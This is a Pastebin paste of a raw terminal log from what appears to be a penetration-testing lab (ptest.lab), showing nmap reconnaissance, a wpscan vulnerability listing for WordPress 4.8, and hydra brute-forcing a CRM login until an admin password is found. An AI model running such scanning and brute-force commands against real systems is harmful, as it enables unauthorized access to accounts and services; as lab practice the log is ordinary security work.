API tools faq
paste
Advertisement
Guest User

crm

a guest
Oct 9th, 2017
792
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.63 KB | None | 0 0
raw download clone embed print report
  1. root@kapirotohat:~# nmap -sS -A -n 192.168.101.10-11
  2.  
  3. Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-09 21:52 -03
  4. Nmap scan report for 192.168.101.10
  5. Host is up (0.73s latency).
  6. Not shown: 996 filtered ports
  7. PORT STATE SERVICE VERSION
  8. 25/tcp open smtp Postfix smtpd
  9. |_smtp-commands: SMTP: EHLO 220 mail.ptest.lab ESMTP Postfix (Debian/GNU)\x0D
  10. 80/tcp open http nginx 1.12.1
  11. |_http-title: 403 Forbidden
  12. 88/tcp open hadoop-datanode Apache Hadoop 1.6.2
  13. | hadoop-datanode-info:
  14. |_ Logs: login-header
  15. |_hadoop-jobtracker-info:
  16. | hadoop-tasktracker-info:
  17. |_ Logs: login-header
  18. |_hbase-master-info:
  19. | http-robots.txt: 1 disallowed entry
  20. |_/
  21. |_http-server-header: nginx/1.6.2
  22. |_http-title: Users
  23. 8080/tcp open http nginx
  24. | http-robots.txt: 1 disallowed entry
  25. |_/
  26. |_http-server-header: nginx
  27. |_http-title: Site doesn't have a title (text/html).
  28. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  29. Device type: specialized|WAP|general purpose|printer|webcam
  30. Running (JUST GUESSING): Crestron 2-Series (88%), Asus embedded (86%), Linux 3.X|2.6.X (86%), HP embedded (86%), AXIS embedded (85%)
  31. OS CPE: cpe:/o:crestron:2_series cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.1 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera
  32. Aggressive OS guesses: Crestron XPanel control system (88%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), HP PSC 2400-series Photosmart printer (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (85%)
  33. No exact OS matches for host (test conditions non-ideal).
  34. Network Distance: 3 hops
  35. Service Info: Host: -mail.ptest.lab
  36.  
  37. TRACEROUTE (using port 25/tcp)
  38. HOP RTT ADDRESS
  39. - Hops 1-2 are the same as for 192.168.101.11
  40. 3 758.72 ms 192.168.101.10
  41.  
  42. Nmap scan report for 192.168.101.11
  43. Host is up (0.72s latency).
  44. Not shown: 999 filtered ports
  45. PORT STATE SERVICE VERSION
  46. 2222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
  47. | ssh-hostkey:
  48. |_ 1024 50:f9:23:6f:7e:3f:bb:68:77:5e:44:99:4d:51:9b:92 (DSA)
  49. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  50. Device type: specialized|WAP|general purpose|printer|webcam
  51. Running (JUST GUESSING): Crestron 2-Series (88%), Asus embedded (86%), Linux 3.X|2.6.X (86%), HP embedded (86%), AXIS embedded (85%)
  52. OS CPE: cpe:/o:crestron:2_series cpe:/h:asus:rt-n56u cpe:/o:linux:linux_kernel:3.4 cpe:/o:linux:linux_kernel:3.1 cpe:/o:linux:linux_kernel:2.6.17 cpe:/h:axis:210a_network_camera cpe:/h:axis:211_network_camera
  53. Aggressive OS guesses: Crestron XPanel control system (88%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), HP PSC 2400-series Photosmart printer (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (85%)
  54. No exact OS matches for host (test conditions non-ideal).
  55. Network Distance: 3 hops
  56. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  57.  
  58. TRACEROUTE (using port 2222/tcp)
  59. HOP RTT ADDRESS
  60. 1 758.28 ms 10.10.0.1
  61. 2 758.55 ms 172.0.1.1
  62. 3 760.72 ms 192.168.101.11
  63.  
  64. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  65. Nmap done: 2 IP addresses (2 hosts up) scanned in 204.82 seconds
  66.  
  67. root@kapirotohat:~# wpscan -a "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" -u 192.168.101.10
  68. _______________________________________________________________
  69. __ _______ _____
  70. \ \ / / __ \ / ____|
  71. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  72. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  73. \ /\ / | | ____) | (__| (_| | | | |
  74. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  75.  
  76. WordPress Security Scanner by the WPScan Team
  77. Version 2.9.2
  78. Sponsored by Sucuri - https://sucuri.net
  79. @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
  80. _______________________________________________________________
  81.  
  82. [+] URL: http://192.168.101.10/
  83. [+] Started: Mon Oct 9 21:58:39 2017
  84.  
  85. [!] The WordPress 'http://192.168.101.10/readme.html' file exists exposing a version number
  86.  
  87. [+] WordPress version 4.8 (Released on 2017-06-08) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
  88. [!] 7 vulnerabilities identified from the version number
  89.  
  90. [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
  91. Reference: https://wpvulndb.com/vulnerabilities/8905
  92. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  93. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
  94. Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
  95. [i] Fixed in: 4.8.2
  96.  
  97. [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
  98. Reference: https://wpvulndb.com/vulnerabilities/8910
  99. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  100. Reference: https://core.trac.wordpress.org/changeset/41398
  101. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
  102. [i] Fixed in: 4.8.2
  103.  
  104. [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
  105. Reference: https://wpvulndb.com/vulnerabilities/8911
  106. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  107. Reference: https://core.trac.wordpress.org/changeset/41457
  108. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
  109. [i] Fixed in: 4.8.2
  110.  
  111. [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
  112. Reference: https://wpvulndb.com/vulnerabilities/8912
  113. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  114. Reference: https://core.trac.wordpress.org/changeset/41397
  115. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
  116. [i] Fixed in: 4.8.2
  117.  
  118. [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
  119. Reference: https://wpvulndb.com/vulnerabilities/8913
  120. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  121. Reference: https://core.trac.wordpress.org/changeset/41448
  122. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
  123. [i] Fixed in: 4.8.2
  124.  
  125. [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
  126. Reference: https://wpvulndb.com/vulnerabilities/8914
  127. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
  128. Reference: https://core.trac.wordpress.org/changeset/41395
  129. Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
  130. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
  131. [i] Fixed in: 4.8.2
  132.  
  133. [!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
  134. Reference: https://wpvulndb.com/vulnerabilities/8807
  135. Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
  136. Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
  137. Reference: https://core.trac.wordpress.org/ticket/25239
  138. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
  139.  
  140. [+] WordPress theme in use: twentyseventeen - v1.3
  141.  
  142. [+] Name: twentyseventeen - v1.3
  143. | Latest version: 1.3 (up to date)
  144. | Location: http://192.168.101.10/wp-content/themes/twentyseventeen/
  145. | Readme: http://192.168.101.10/wp-content/themes/twentyseventeen/README.txt
  146. | Style URL: http://192.168.101.10/wp-content/themes/twentyseventeen/style.css
  147. | Theme Name: Twenty Seventeen
  148. | Theme URI: https://wordpress.org/themes/twentyseventeen/
  149. | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a...
  150. | Author: the WordPress team
  151. | Author URI: https://wordpress.org/
  152.  
  153. [+] Enumerating plugins from passive detection ...
  154. | 1 plugin found:
  155.  
  156. [+] Name: kittycatfish-2.2 - v2.2
  157. | Location: http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/
  158. | Readme: http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/readme.txt
  159.  
  160. [+] Finished: Mon Oct 9 22:01:21 2017
  161. [+] Requests Done: 63
  162. [+] Memory used: 63.863 MB
  163. [+] Elapsed time: 00:02:41
  164. root@kapirotohat:~# hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A1d24833a22417d1d4e19be2c43ff5021e2ff5a5a%2C1500076613&username=^USER^&password=^PASS^:Invalid username or password." -l admin -P '/root/Área de trabalho/backup kapiroto/WORDLIST/letrasminus.txt' -t 20 -o crm.txt
  165. Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  166.  
  167. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-09 22:37:52
  168. [ERROR] Maximum number of passwords is 50000000, this file has 308915777 entries.
  169.  
  170. root@kapirotohat:~# cd /root/Área\ de\ trabalho/backup\ kapiroto/WORDLIST/
  171. root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# ls
  172. azmaiu.txt letrasminus.txt nume.txt
  173. root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# split --lines 5000000 letrasminus.txt
  174. root@kapirotohat:~/Área de trabalho/backup kapiroto/WORDLIST# hydra 192.168.101.10 -s 88 http-form-post "/index.php?module=Users&action=Login:__vtrftk=sid%3A1d24833a22417d1d4e19be2c43ff5021e2ff5a5a%2C1500076613&username=^USER^&password=^PASS^:Invalid username or password." -l admin -P '/root/Área de trabalho/backup kapiroto/WORDLIST/xbl' -t 20 -o crm.txt
  175. Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  176.  
  177. Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-09 23:16:42
  178. [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
  179. [DATA] max 20 tasks per 1 server, overall 64 tasks, 4999999 login tries (l:1/p:4999999), ~3906 tries per task
  180. [DATA] attacking service http-post-form on port 88
  181. [STATUS] 149.00 tries/min, 149 tries in 00:01h, 4999850 to do in 559:17h, 20 active
  182. [STATUS] 147.33 tries/min, 442 tries in 00:03h, 4999557 to do in 565:34h, 20 active
  183. [STATUS] 147.29 tries/min, 1031 tries in 00:07h, 4998968 to do in 565:41h, 20 active
  184. [88][http-post-form] host: 192.168.101.10 login: admin password: blackstar
  185. 1 of 1 target successfully completed, 1 valid password found
  186. Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-09 23:29:05
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!